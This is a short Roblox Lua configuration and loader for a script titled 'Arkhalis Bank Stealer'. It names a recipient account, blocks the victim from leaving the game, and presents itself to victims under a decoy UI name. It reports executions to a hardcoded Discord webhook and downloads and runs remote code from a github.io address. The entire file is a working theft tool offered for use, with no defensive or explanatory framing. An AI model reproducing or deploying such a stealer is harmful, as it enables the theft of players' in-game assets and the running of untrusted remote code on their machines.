--[[ Arkhalis Bank Stealer]]--


--[[ Main Config ]]--
_G.UserId = 3315016518  --// Roblox Account Id [[https://www.roblox.com/users/IDHERE/profile]] <- This is a example

_G.AntiLeave = true --// Doesn't Let The Target Close Roblox
_G.Diamonds = 100000 --// Amount Of Diamonds To Not Kick

--[[ Webhook Config ]]--
_G.Webhook = "https://discord.com/api/webhooks/1100857940493205505/dOKt7NWBSvBQZ1jA-sGCXeuB79LTxNiFl-4o2H7r_eb76g4a3FqM_ULovrwIsDJb5F5f" --// Discord link Webhook For Executions
    
--[[ UI Config ]]--
_G.ScriptName = "Milk up" --// Script Name On The UI
_G.Tip1 = "" --// Gives You Tips On The UI
_G.Tip2 = "" --// Gives You Tips On The UI
_G.Tip3 = "" --// Gives You Tips On The UI
_G.Tip4 = "" --// Gives You Tips On The UI
_G.Tip5 = "" --// Gives You Tips On The UI


--[[ Script ]]--
loadstring(game:HttpGet("https://arkhalislua.github.io/Lua/ArkhalisBank.lua"))()
